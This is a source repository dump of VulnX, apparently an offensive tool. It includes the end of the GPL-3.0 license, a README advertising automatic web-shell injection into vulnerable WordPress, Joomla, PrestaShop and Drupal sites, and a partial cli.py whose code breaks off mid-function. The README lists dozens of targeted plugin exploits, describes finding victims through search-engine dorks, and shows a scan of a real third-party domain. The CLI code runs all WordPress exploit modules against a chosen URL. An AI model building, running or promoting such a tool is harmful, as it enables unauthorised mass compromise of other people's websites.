578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 
613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 
651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

3 | VulnX 4 |
5 | VulnX 6 |


Vulnx 🕷️ is an intelligent bot and automatic shell injector that detects vulnerabilities in multiple types of CMS



27 | 28 | ![Screenshot from 2019-06-19 05-22-04](https://user-images.githubusercontent.com/23563528/59736664-7c2fed00-9252-11e9-936d-53ea02628711.png) 29 | 30 | https://github.com/anouarbensaad/vulnx/archive/master.zip 31 |

32 | VulnX Wiki • 33 | How To Use • 34 | Compatibility • 35 | Library • 36 |

37 | 38 | **Vulnx** is An Intelligent Bot Auto [Shell Injector](https://github.com/anouarbensaad/vulnx/wiki/Usage#run-exploits) that detects vulnerabilities in multiple types of Cms, fast cms detection,informations gathering and vulnerabilitie Scanning of the target like subdomains, ipaddresses, country, org, timezone, region, ans and more ... 39 | 40 | Instead of injecting each and every shell manually like all the other tools do, VulnX analyses the target website checking the presence of a vulnerabilitie if so the shell will be Injected.searching urls with [dorks](https://github.com/anouarbensaad/vulnx/wiki/Usage#searching-dorks) Tool. 41 | 42 | ------------------------------------- 43 | 44 | ### _🕷️ Features_ 45 | 46 | - Detects cms (wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia) 47 | - Target informations gatherings 48 | - Target Subdomains gathering 49 | - Multi-threading on demand 50 | - Checks for vulnerabilities 51 | - Auto shell injector 52 | - Exploit dork searcher 53 | - [`Ports Scan`](https://user-images.githubusercontent.com/23563528/58365946-40a83a00-7ec3-11e9-87c5-055ed67109b7.jpg) High Level 54 | - [`Dns`](https://user-images.githubusercontent.com/23563528/58365784-09388e00-7ec1-11e9-8a05-e71fa39f146d.png)-Servers Dump 55 | - Input multiple target to scan. 56 | - Dorks Listing by Name& by ExploitName. 57 | - Export multiple target from Dorks into a logfile. 58 | 59 | ------------------------------------- 60 | 61 | 62 | ### _🕷️ DNS-Map-Results_ 63 | 64 | To do this,run a scan with the --dns flag and -d for subdomains. 65 | To generate a map of isetso.rnu.tn, you can run the command 66 | `vulnx -u isetso.rnu.tn --dns -d --output $PATH`in a new terminal. 67 | 68 | `$PATH` : Where the graphs results will be stored. 
69 | 70 | ![vokoscreen-2019-06-19_05-44-07](https://user-images.githubusercontent.com/23563528/59737395-696ae780-9255-11e9-9e09-26416de89bee.gif) 71 | 72 | 73 | Let's generates an image displaying target Subdomains,MX & DNS data. 74 | 75 | 76 | ![demo](https://i.ibb.co/WfdhvWC/isetso-rnu-tn.png) 77 | 78 | ------------------------------------- 79 | 80 | ### _🕷️ Exploits_ 81 |

82 | Exploits Running 83 |

84 | 85 | ##### Joomla 86 | - [x] [Com Jce ]('#') 87 | - [x] [Com Jwallpapers ]('#') 88 | - [x] [Com Jdownloads ]('#') 89 | - [x] [Com Jdownloads2 ]('#') 90 | - [x] [Com Weblinks ]('#') 91 | - [x] [Com Fabrik ]('#') 92 | - [x] [Com Fabrik2 ]('#') 93 | - [x] [Com Jdownloads Index]('#') 94 | - [x] [Com Foxcontact ]('#') 95 | - [x] [Com Blog ]('#') 96 | - [x] [Com Users ]('#') 97 | - [x] [Com Ads Manager ]('#') 98 | - [x] [Com Sexycontactform]('#') 99 | - [x] [Com Media ]('#') 100 | - [x] [Mod_simplefileupload]('#') 101 | - [x] [Com Facileforms ]('#') 102 | - [x] [Com Facileforms ]('#') 103 | - [x] [Com extplorer ]('#') 104 | 105 | ##### Wordpress 106 | - [x] [Simple Ads Manager ](https://www.exploit-db.com/exploits/36614) 107 | - [x] [InBoundio Marketing ](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_inboundio_marketing_file_upload) 108 | - [x] [WPshop eCommerce ](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_wpshop_ecommerce_file_upload) 109 | - [x] [Synoptic ](https://cxsecurity.com/issue/WLB-2017030099) 110 | - [x] [Showbiz Pro ](https://www.exploit-db.com/exploits/35385) 111 | - [x] [Job Manager ](https://www.exploit-db.com/exploits/45031) 112 | - [x] [Formcraft ](https://www.exploit-db.com/exploits/30002) 113 | - [x] [PowerZoom ](http://www.exploit4arab.org/exploits/399) 114 | - [x] [Download Manager ](https://www.exploit-db.com/exploits/35533) 115 | - [x] [CherryFramework ](https://www.exploit-db.com/exploits/45896) 116 | - [x] [Catpro ](https://vulners.com/zdt/1337DAY-ID-20256) 117 | - [x] [Blaze SlideShow ](https://0day.today/exploits/18500) 118 | - [x] [Wysija-Newsletters ](https://www.exploit-db.com/exploits/33991) 119 | 120 | ##### Drupal 121 | - [ ] [Add Admin ]('#') 122 | - [ ] [Drupal BruteForcer ]('#') 123 | - [ ] [Drupal Geddon2 ]('#') 124 | 125 | ##### PrestaShop 126 | - [x] [attributewizardpro ]('#') 127 | - [x] [columnadverts ]('#') 128 | - [ ] [soopamobile ]('#') 129 | - [x] [pk_flexmenu ]('#') 130 | - [x] [pk_vertflexmenu 
]('#') 131 | - [x] [nvn_export_orders ]('#') 132 | - [x] [megamenu ]('#') 133 | - [x] [tdpsthemeoptionpanel ]('#') 134 | - [ ] [psmodthemeoptionpanel]('#') 135 | - [x] [masseditproduct ]('#') 136 | - [ ] [blocktestimonial ]('#') 137 | - [x] [soopabanners ]('#') 138 | - [x] [Vtermslideshow ]('#') 139 | - [x] [simpleslideshow ]('#') 140 | - [x] [productpageadverts ]('#') 141 | - [x] [homepageadvertise ]('#') 142 | - [ ] [homepageadvertise2 ]('#') 143 | - [x] [jro_homepageadvertise]('#') 144 | - [x] [advancedslider ]('#') 145 | - [x] [cartabandonmentpro ]('#') 146 | - [x] [cartabandonmentproOld]('#') 147 | - [x] [videostab ]('#') 148 | - [x] [wg24themeadministration]('#') 149 | - [x] [fieldvmegamenu ]('#') 150 | - [x] [wdoptionpanel ]('#') 151 | 152 | ##### Opencart 153 | - [ ] [Opencart BruteForce]('#') 154 | 155 | 156 | ------------------------------------- 157 | 158 | ### _🕷️ VulnxMode_ 159 | `NEW` 160 | vulnx now have an interactive mode. 161 | ***URLSET*** 162 | 163 | ![vulnxmode_url](https://user-images.githubusercontent.com/23563528/68983791-fddd7400-080c-11ea-8e2b-c463a2c8f8c5.png) 164 | 165 | ***DORKSET*** 166 | 167 | ![vulnxmode_dorks](https://user-images.githubusercontent.com/23563528/68985825-bf01eb00-0819-11ea-83ea-3db022b1d645.png) 168 | 169 | ------------------------------------- 170 | 171 | 172 | 173 | ### _🕷️ Available command line options_ 174 | [`READ VULNX WIKI`](https://github.com/anouarbensaad/vulnx/wiki/Usage) 175 | 176 | usage: vulnx [options] 177 | 178 | -u --url url target 179 | -D --dorks search webs with dorks 180 | -o --output specify output directory 181 | -t --timeout http requests timeout 182 | -c --cms-info search cms info[themes,plugins,user,version..] 
183 | -e --exploit searching vulnerability & run exploits 184 | -w --web-info web informations gathering 185 | -d --domain-info subdomains informations gathering 186 | -l, --dork-list list names of dorks exploits 187 | -n, --number-page number page of search engine(Google) 188 | -p, --ports ports to scan 189 | -i, --input specify domains to scan from an input file 190 | --threads number of threads 191 | --dns dns informations gathering 192 | 193 | ------------------------------------- 194 | 195 | ### _🕷️ Docker_ 196 | 197 | VulnX in DOCKER !!. 198 | 199 | ```bash 200 | $ git clone https://github.com/anouarbensaad/VulnX.git 201 | $ cd VulnX 202 | $ docker build -t vulnx ./docker/ 203 | $ docker run -it --name vulnx vulnx:latest -u http://example.com 204 | ``` 205 | 206 | run vulnx container in interactive mode 207 | 208 | 209 | ![vokoscreen-2019-06-23_11-53-20](https://user-images.githubusercontent.com/23563528/59975226-a31d5480-95ad-11e9-8252-ddd8291cbee4.gif) 210 | 211 | 212 | to view logfiles mount it in a volume like so: 213 | 214 | ```bash 215 | $ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest -u http://example.com 216 | ``` 217 | 218 | change the [mounting directory](https://github.com/anouarbensaad/vulnx/blob/master/docker/Dockerfile#L46).. 
219 | 220 | ```Dockerfile 221 | VOLUME [ "$PATH" ] 222 | ``` 223 | 224 | ------------------------------------- 225 | 226 | ### _🕷️ Install vulnx on Ubuntu_ 227 | 228 | 229 | ```bash 230 | $ git clone https://github.com/anouarbensaad/vulnx.git 231 | $ cd VulnX 232 | $ chmod +x install.sh 233 | $ ./install.sh 234 | ``` 235 | Now run `vulnx` 236 | 237 | ![vokoscreen-2019-07-05_03-59-48](https://user-images.githubusercontent.com/23563528/60695392-7a645b80-9ed9-11e9-94fb-f6025594a9e3.gif) 238 | 239 | 240 | ### _🕷️ Install vulnx on Termux_ 241 | 242 | ```BASH 243 | $ pkg update 244 | $ pkg install -y git 245 | $ git clone http://github.com/anouarbensaad/vulnx 246 | $ cd vulnx 247 | $ chmod +x install.sh 248 | $ ./install.sh 249 | ``` 250 | [**CLICK HERE TO SHOW THE RESULT**](https://user-images.githubusercontent.com/23563528/58364091-98847800-7ea6-11e9-9a9a-c27717e4dda1.png) 251 | 252 | 253 | ### _🕷️ Install vulnx in Windows_ 254 | 255 | - [click here](https://github.com/anouarbensaad/vulnx/archive/master.zip) to download vulnx 256 | - download and install python3 257 | - unzip **vulnx-master.zip** in ***c:/*** 258 | - open the command prompt **cmd**. 259 | ``` 260 | > cd c:/vulnx-master 261 | > python vulnx.py 262 | ``` 263 | 264 | ------------------------------------- 265 | 266 | ##### example command with options : settimeout=3 , cms-gathering = all , -d subdomains-gathering , run --exploits 267 | `vulnx -u http://example.com --timeout 3 -c all -d -w --exploit` 268 | 269 | ##### example command for searching dorks : -D or --dorks , -l --list-dorks 270 | `vulnx --list-dorks` 271 | return table of exploits name. 
272 | `vulnx -D blaze` 273 | return urls found with blaze dork 274 | 275 | ------------------------------------- 276 | 277 | ### _🕷️ Versions_ 278 | - [v1.9](https://github.com/anouarbensaad/vulnx/releases/tag/v1.9) 279 | - [v1.8](https://github.com/anouarbensaad/vulnx/releases/tag/v1.8) 280 | - [v1.7](https://github.com/anouarbensaad/vulnx/releases/tag/v1.7) 281 | - [v1.6](https://github.com/anouarbensaad/vulnx/releases/tag/v1.6) 282 | - [v1.5](https://github.com/anouarbensaad/vulnx/releases/tag/v1.5) 283 | - [v1.4](https://github.com/anouarbensaad/vulnx/releases/tag/v1.4) 284 | - [v1.3](https://github.com/anouarbensaad/vulnx/releases/tag/v1.3) 285 | - [v1.2](https://github.com/anouarbensaad/vulnx/releases/tag/v1.2) 286 | - [v1.1](https://github.com/anouarbensaad/vulnx/releases/tag/v1.1) 287 | 288 | ------------------------------------- 289 | 290 | ### :warning: Warning! 291 | 292 | ***I Am Not Responsible of any Illegal Use*** 293 | 294 | ------------------------------------- 295 | 296 | ### _🕷️ Contribution & License_ 297 | 298 | You can contribute in following ways: 299 | 300 | - [Report bugs & add issues](https://github.com/anouarbensaad/VulnX/issues/new) 301 | - Search for new vulnerability 302 | - Develop plugins 303 | - Searching Exploits 304 | - Give suggestions **(Ideas)** to make it better 305 | 306 | Do you want to have a conversation in private? 
email me : Bensaad.tig@gmail.com 307 | 308 | ***VulnX*** is licensed under [GPL-3.0 License](https://github.com/anouarbensaad/VulnX/blob/master/LICENSE) 309 | -------------------------------------------------------------------------------- /cli.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | import time 4 | import os 5 | import re 6 | import readline 7 | import glob 8 | import subprocess 9 | from common.colors import end,W,R,B,bannerblue2 10 | from common.banner import banner 11 | from common.requestUp import random_UserAgent 12 | from common.uriParser import parsing_url 13 | from modules.wpExploits import( wp_wysija, 14 | wp_blaze, 15 | wp_catpro, 16 | wp_cherry, 17 | wp_dm, 18 | wp_fromcraft, 19 | wp_jobmanager, 20 | wp_showbiz, 21 | wp_synoptic, 22 | wp_shop, 23 | wp_powerzoomer, 24 | wp_revslider, 25 | wp_adsmanager, 26 | wp_inboundiomarketing, 27 | wp_levoslideshow, 28 | wp_adblockblocker, 29 | ) 30 | 31 | 32 | url_regx=re.compile(r'^set url .+') 33 | dork_regx=re.compile(r'^dork') 34 | exec_regx=re.compile(r'^exec .+') 35 | help_regx=re.compile(r'^help') 36 | history_regx=re.compile(r'^history') 37 | exit_regx=re.compile(r'^exit') 38 | cls_regx=re.compile(r'^clear') 39 | var_regx=re.compile(r'^variable') 40 | back_regx=re.compile(r'^back') 41 | run_regx=re.compile(r'^run') 42 | output=re.compile(r'^output \w+$') 43 | page=re.compile(r'^page \d+$') 44 | dorkname_regx=re.compile(r'^set dork .+') 45 | list_regx=re.compile(r'^list') 46 | 47 | 48 | headers = { 49 | 'host' : 'google.com', 50 | 'User-Agent' : random_UserAgent(), 51 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 52 | 'Accept-Language': 'en-US,en;q=0.5', 53 | 'Connection': 'keep-alive',} 54 | 55 | history = [] 56 | 57 | #VARIABLE 58 | numberpage=1 #default page−dork variable 59 | output_dir='logs'#default output−dork 60 | dorkname='' 61 | url='' 62 | timeout='' 63 | 64 | W_UL= "\033[4m" 65 | 
RED_U='\033[1;1;91m' 66 | 67 | #autocompleter 68 | autocompleter_global = ["help","clear","use","info","set","variables","history","exec","dork"] 69 | autocompleter_dork = ["help" , "list" , "set dork" , "clear" , "history" ,"variables" ,"exec","back"] 70 | autocompleter_setdork=["help" , "output" ,"page","run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"] 71 | autocompleter_dork_page=["help" , "output" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"] 72 | autocompleter_dork_output=["help" , "page" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"] 73 | autocompleter_dork_page_output=["help" ,"run" ,"clear" ,"exec" ,"history" ,"variables" ,"back"] 74 | 75 | vulnresults = set() # results of vulnerability exploits. [success or failed] 76 | grabinfo = set() # return cms_detected the version , themes , plugins , user .. 77 | subdomains = set() # return subdomains & ip. 78 | hostinfo = set() # host info 79 | data = [ vulnresults, grabinfo, subdomains , hostinfo] 80 | 81 | data_names = ['vulnresults', 'grabinfo', 'subdomains' , 'hostinfo'] 82 | 83 | data = { 84 | 'vulnresults':list(vulnresults), 85 | 'grabinfo':list(grabinfo), 86 | 'subdomains':list(subdomains), 87 | } 88 | 89 | class Helpers(): 90 | 91 | @staticmethod 92 | def _general_help(): 93 | print(""" 94 | Command Description 95 | -------- ------------- 96 | help/? Show this help menu. 97 | clear/cls clear the vulnx screen 98 | use Use an variable. 99 | info Get information about an available variable. 100 | set Sets a context-specific variable to a value to use while using vulnx. 101 | variables Prints all previously specified variables. 102 | banner Display banner. 103 | history Display command-line most important history from the beginning. 104 | makerc Save command-line history to a file. 
105 | exec Execute a system command without closing the vulnx-mode 106 | exit/quit Exit the vulnx-mode 107 | """) 108 | 109 | @staticmethod 110 | def _url_action_help(): 111 | print(""" 112 | Command Description 113 | -------- ------------- 114 | help/? Show this help menu. 115 | timeout set timeout 116 | ports scan ports 117 | domain get domains & sub domains 118 | cms info get cms info (version , user ..) 119 | web info get web info 120 | dump dns dump dns get sub domains [mx-server..] 121 | run exploit run exploits corresponding to cms 122 | clear/cls clear the vulnx screen 123 | history Display command-line most important history from the beginning. 124 | variables Prints all previously specified variables. 125 | back move back from current context 126 | """) 127 | 128 | #dorks - command helpers. 129 | 130 | @staticmethod 131 | def _dorks_action_help(): 132 | print(""" 133 | Command Description 134 | -------- ------------- 135 | help/? Show this help menu. 136 | list list dorks 137 | set dork set exploit name 138 | clear/cls clear the vulnx screen 139 | history Display command-line most important history from the beginning. 140 | variables Prints all previously specified variables. 141 | exec Execute a system command without closing the vulnx-mode 142 | back move back from current context 143 | """) 144 | 145 | @staticmethod 146 | def _dorks_setdork_help(): 147 | print(""" 148 | Command Description 149 | -------- ------------- 150 | help/? Show this help menu. 151 | pages set num page 152 | output output file. 153 | run search web with specified dork 154 | clear/cls clear the vulnx screen 155 | history Display command-line most important history from the beginning. 156 | variables Prints all previously specified variables. 
157 | exec Execute a system command without closing the vulnx-mode 158 | back move back from current context 159 | """) 160 | 161 | @staticmethod 162 | def _dorks_setdork_page_help(): 163 | print(""" 164 | Command Description 165 | -------- ------------- 166 | help/? Show this help menu. 167 | output output file. 168 | run search web with specified dork 169 | clear/cls clear the vulnx screen 170 | exec Execute a system command without closing the vulnx-mode 171 | history Display command-line most important history from the beginning. 172 | variables Prints all previously specified variables. 173 | back move back from current context 174 | """) 175 | 176 | @staticmethod 177 | def _dorks_setdork_output_help(): 178 | print(""" 179 | Command Description 180 | -------- ------------- 181 | help/? Show this help menu. 182 | pages set num page 183 | run search web with specified dork 184 | exec Execute a system command without closing the vulnx-mode 185 | clear/cls clear the vulnx screen 186 | history Display command-line most important history from the beginning. 187 | variables Prints all previously specified variables. 188 | back move back from current context 189 | """) 190 | 191 | @staticmethod 192 | def _dorks_setdork_page_output_help(): 193 | print(""" 194 | Command Description 195 | -------- ------------- 196 | help/? Show this help menu. 197 | run search web with specified dork 198 | clear/cls clear the vulnx screen 199 | exec Execute a system command without closing the vulnx-mode 200 | history Display command-line most important history from the beginning. 201 | variables Prints all previously specified variables. 
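back             move back from current context
        """)


class Cli():
    """Interactive shell of vulnx.

    ``send_commands`` is the top-level read-eval loop.  From it the operator
    enters either a *target* session (``set url ...``), which can run the
    WordPress exploit modules against one host, or a *dorks* session
    (``set dork ...``), which drives ``modules.dorksEngine``.

    Everything this class leans on -- ``history``, the ``*_regx`` matchers
    (including the ``page`` and ``output`` ones), the ``autocompleter_*``
    word lists, the colour codes and the defaults ``headers``/``dorkname``/
    ``output_dir``/``numberpage``/``url``/``timeout`` -- is defined at module
    level earlier in this file.
    """

    def __runExploits(self, url, headers):
        """Run every WordPress exploit module against ``url``.

        Each module appends its findings to the module-level ``vulnresults``.
        """
        exploits = (
            wp_wysija, wp_blaze, wp_catpro, wp_cherry, wp_dm, wp_fromcraft,
            wp_shop, wp_revslider, wp_adsmanager, wp_inboundiomarketing,
            wp_levoslideshow, wp_adblockblocker,
        )
        for exploit in exploits:
            exploit(url, headers, vulnresults)

    def pathCompleter(self, text, state):
        """readline completer: the ``state``-th filesystem match for ``text``.

        readline calls this with state 0, 1, 2, ... and stops at the first
        IndexError, so running off the end of the match list is expected.
        """
        return glob.glob(text + '*')[state]

    def createListCompleter(self, ll):
        """Build ``self.listCompleter``, a readline completer over ``ll``.

        The whole line buffer (not just the current word) is matched, which
        together with ``set_completer_delims('\\t')`` lets multi-word
        commands such as ``set dork`` complete as one unit.
        """
        def listCompleter(text, state):
            line = readline.get_line_buffer()
            candidates = ll if not line else [c for c in ll if c.startswith(line)]
            return [c + " " for c in candidates][state]
        self.listCompleter = listCompleter

    @staticmethod
    def _install_completer(words):
        """Bind TAB completion of ``words`` for the next ``input()`` prompt."""
        t = Cli()
        t.createListCompleter(words)
        # Only TAB is a delimiter, so the whole typed line is completed at once.
        readline.set_completer_delims('\t')
        readline.parse_and_bind("tab: complete")
        readline.set_completer(t.listCompleter)

    @staticmethod
    def autoComplete_Global():
        """Completion words for the top-level prompt."""
        Cli._install_completer(autocompleter_global)

    @staticmethod
    def autoComplete_Dork():
        """Completion words for the ``(Dorks)`` prompt."""
        Cli._install_completer(autocompleter_dork)

    @staticmethod
    def autoComplete_Page():
        """Completion words once a page count is fixed."""
        Cli._install_completer(autocompleter_dork_page)

    @staticmethod
    def autoComplete_Output():
        """Completion words once an output directory is fixed."""
        Cli._install_completer(autocompleter_dork_output)

    @staticmethod
    def autoComplete_Page_Output():
        """Completion words once both page count and output are fixed."""
        Cli._install_completer(autocompleter_dork_page_output)

    @staticmethod
    def autoComplete_setdork():
        """Completion words right after ``set dork <name>``."""
        Cli._install_completer(autocompleter_setdork)

    @staticmethod
    def dork_variable(dorkname, output, page):
        """Print the variables of the dorks session."""
        print("""
        VARIABLE         VALUE
        --------         -----
        dorkname         %s
        output           %s
        pages            %s

        """ % (dorkname, output, page))

    @staticmethod
    def url_variable(url, timeout):
        """Print the variables of the target session."""
        print("""
        VARIABLE         VALUE
        --------         -----
        url              %s
        timeout          %s

        """ % (url, timeout))

    @staticmethod
    def global_variables(dorkname, output, page, url, timeout):
        """Print every session variable.

        Rows are labelled url, timeout, dorkname, output, pages; the tuple
        below is ordered to match.  It used to be passed in parameter order,
        which printed the dork name in the url row and so on.
        """
        print("""
        VARIABLE         VALUE
        --------         -----
        url              %s
        timeout          %s
        dorkname         %s
        output           %s
        pages            %s

        """ % (url, timeout, dorkname, output, page))

    @staticmethod
    def _clearscreen():
        """Clear the terminal with the POSIX ``clear``; returns its exit status."""
        return os.system('clear')

    @staticmethod
    def _print_history():
        """List the commands typed so far, oldest first, numbered from 1.

        (The previous loop indexed ``history[i-1]`` and so printed the most
        recent entry first, under number 1.)
        """
        for index, entry in enumerate(history, 1):
            print(" %s %s" % (index, entry))

    @staticmethod
    def _exec(cmd):
        """Run the operator's ``exec <command>`` through the system shell.

        This is a deliberate shell escape for the person at the keyboard, not
        a privilege boundary: the text after ``exec`` reaches the shell
        unmodified, exactly as if typed in a terminal.  Returns the
        ``os.system`` status, or None when ``cmd`` has no command part.
        """
        match = re.match(r'^exec (.+)', cmd)
        if match:
            return os.system(match.group(1))
        return None

    @staticmethod
    def getDork(pattern):
        """Return the dork name from ``set dork <name>``, or None."""
        match = re.match(r'^set dork (.+)', pattern)
        return match.group(1) if match else None

    @staticmethod
    def setPage(page):
        """Return the page count from ``page <digits>`` as an int, or None."""
        match = re.match(r'^page (\d+$)', page)
        return int(match.group(1)) if match else None

    @staticmethod
    def setOutput(directory):
        """Return the output directory name from ``output <name>``, or None.

        Only ``\\w+`` is accepted: a single path component without separators
        or ``..``, so the name cannot point outside the directory the output
        writer later joins it to.
        """
        match = re.match(r'^output (\w+$)', directory)
        return match.group(1) if match else None

    @staticmethod
    def getUrl(pattern):
        """Return the target from ``set url <target>``, or None.

        This was decorated with ``@property`` while taking an argument, so
        every ``self.getUrl(cmd)`` call raised TypeError; it is now a plain
        static helper like ``getDork``.  The value is returned unparsed.
        """
        match = re.match(r'^set url (.+)', pattern)
        return match.group(1) if match else None

    @staticmethod
    def _dork_common(cmd, help_fn, show_vars):
        """Commands available at every level of the dorks session.

        ``help_fn`` prints the help menu of the current level and
        ``show_vars`` prints its variables.  As in the original if-chains,
        several checks may fire for one line.
        """
        if help_regx.search(cmd) or cmd == '?':
            help_fn()
        if cls_regx.search(cmd) or cmd == 'cls':
            Cli._clearscreen()
        if exit_regx.search(cmd) or cmd == 'quit':
            sys.exit()
        if history_regx.search(cmd):
            Cli._print_history()
        if exec_regx.search(cmd):
            Cli._exec(cmd)
        if var_regx.search(cmd):
            show_vars()

    def _dork_context(self, dork, page_no=None, out_name=None):
        """One nesting level of the dorks session for ``dork``.

        ``page_no`` and ``out_name`` hold the values fixed at the levels
        above (None = not set; the module defaults ``numberpage`` and
        ``output_dir`` are used when the search runs).  ``page N`` and
        ``output NAME`` each descend one level with that value fixed,
        ``run`` launches ``Dorks.searchengine`` with the values of this
        level, and ``back`` returns to the caller.  The module-level ``page``
        and ``output`` regexes decide which command was typed.
        """
        has_page, has_output = page_no is not None, out_name is not None
        completer, help_fn = {
            (False, False): (Cli.autoComplete_setdork, Helpers._dorks_setdork_help),
            (True, False): (Cli.autoComplete_Page, Helpers._dorks_setdork_page_help),
            (False, True): (Cli.autoComplete_Output, Helpers._dorks_setdork_output_help),
            (True, True): (Cli.autoComplete_Page_Output, Helpers._dorks_setdork_page_output_help),
        }[(has_page, has_output)]
        label = dork if page_no is None else '%s-%s' % (dork, page_no)
        prompt = "%s%svulnx%s%s (%sDorks-%s%s)> %s" % (bannerblue2, W_UL, end, W, B, label, W, end)
        run_output = output_dir if out_name is None else out_name
        run_page = numberpage if page_no is None else page_no
        while True:
            completer()
            cmd = input(prompt)
            history.append(cmd)
            if back_regx.search(cmd):
                break
            if page_no is None and page.search(cmd):
                new_page = Cli.setPage(cmd)
                if new_page is None:
                    print("usage: page <number>")
                else:
                    self._dork_context(dork, new_page, out_name)
            elif out_name is None and output.search(cmd):
                new_output = Cli.setOutput(cmd)
                if new_output is None:
                    print("usage: output <name>   (letters, digits and _ only)")
                else:
                    self._dork_context(dork, page_no, new_output)
            elif run_regx.search(cmd):
                print('\n')
                from modules.dorksEngine import Dorks as D
                # The deepest level used to pass the 'page N' command to
                # setOutput() and so always ran with output=None.
                D.searchengine(dork, headers, run_output, run_page)
            Cli._dork_common(
                cmd, help_fn,
                lambda: Cli.dork_variable(dork, run_output, run_page))

    def setdorkCLI(self, cmd_interpreter):
        """Dorks session, entered from ``send_commands``.

        ``cmd_interpreter`` is the command that opened the session; it is
        overwritten by each prompt.  ``list`` prints the known dork names,
        ``set dork <name>`` opens the per-dork context, ``back`` returns to
        the top-level loop.
        """
        while True:
            Cli.autoComplete_Dork()
            cmd_interpreter = input("%s%svulnx%s%s (%sDorks%s)> %s" % (bannerblue2, W_UL, end, W, B, W, end))
            history.append(cmd_interpreter)
            if back_regx.search(cmd_interpreter):
                break
            if list_regx.search(cmd_interpreter):
                print('\n%s[*]%s Listing dorks name..' % (B, end))
                from modules.dorksEngine import DorkList as DL
                DL.dorkslist()
            Cli._dork_common(
                cmd_interpreter, Helpers._dorks_action_help,
                lambda: Cli.dork_variable(dorkname, output_dir, numberpage))
            if dorkname_regx.search(cmd_interpreter):
                dork = Cli.getDork(cmd_interpreter)
                if dork is None:
                    print("usage: set dork <name>")
                else:
                    self._dork_context(dork)

    def _url_session(self, target):
        """Target session entered by ``set url <target>``."""
        if target is None:
            print("usage: set url <host or url>")
            return
        prompt = "%s%svulnx%s%s target(%s%s%s) > %s" % (bannerblue2, W_UL, end, W, R, target, W, end)
        while True:
            cmd_interpreter = input(prompt)
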